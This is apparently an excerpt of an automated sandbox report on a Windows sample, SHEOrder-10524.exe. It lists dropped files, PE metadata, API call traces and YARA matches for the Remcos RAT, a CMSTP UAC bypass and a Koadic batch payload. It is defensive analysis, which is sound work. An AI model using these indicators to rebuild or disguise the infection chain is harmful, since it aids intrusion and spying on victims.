                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: String function: 028C4824 appears 883 times
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: String function: 028C4698 appears 247 times
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: String function: 028D7BE8 appears 45 times
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: String function: 028C6658 appears 32 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00434E10 appears 108 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 0040417E appears 46 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00402093 appears 100 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00434770 appears 82 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 004169A7 appears 87 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 004165FF appears 35 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00411F67 appears 32 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 004020DF appears 40 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 004484CA appears 36 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 004046F7 appears 34 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00402213 appears 38 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 004052FD appears 32 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00401E65 appears 70 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00401FAB appears 42 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00457A28 appears 34 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 00416760 appears 69 times
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: String function: 004458D0 appears 56 times
                  Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
                  Source: SHEOrder-10524.exeBinary or memory string: OriginalFilename vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1730288675.0000000013B70000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000003.1713246156.000000007E8F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000003.1713537001.000000007FBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000003.1676709365.000000007FBF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1732244936.0000000014BF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exe, 00000000.00000002.1734320711.000000007EE40000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs SHEOrder-10524.exe
                  Source: SHEOrder-10524.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\Public\Libraries\WagotghlO.bat, type: DROPPEDMatched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@21/12@4/3
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,5_2_004182CE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_2_00417952
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,4_1_00417952
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C7F8E GetDiskFreeSpaceA,0_2_028C7F8E
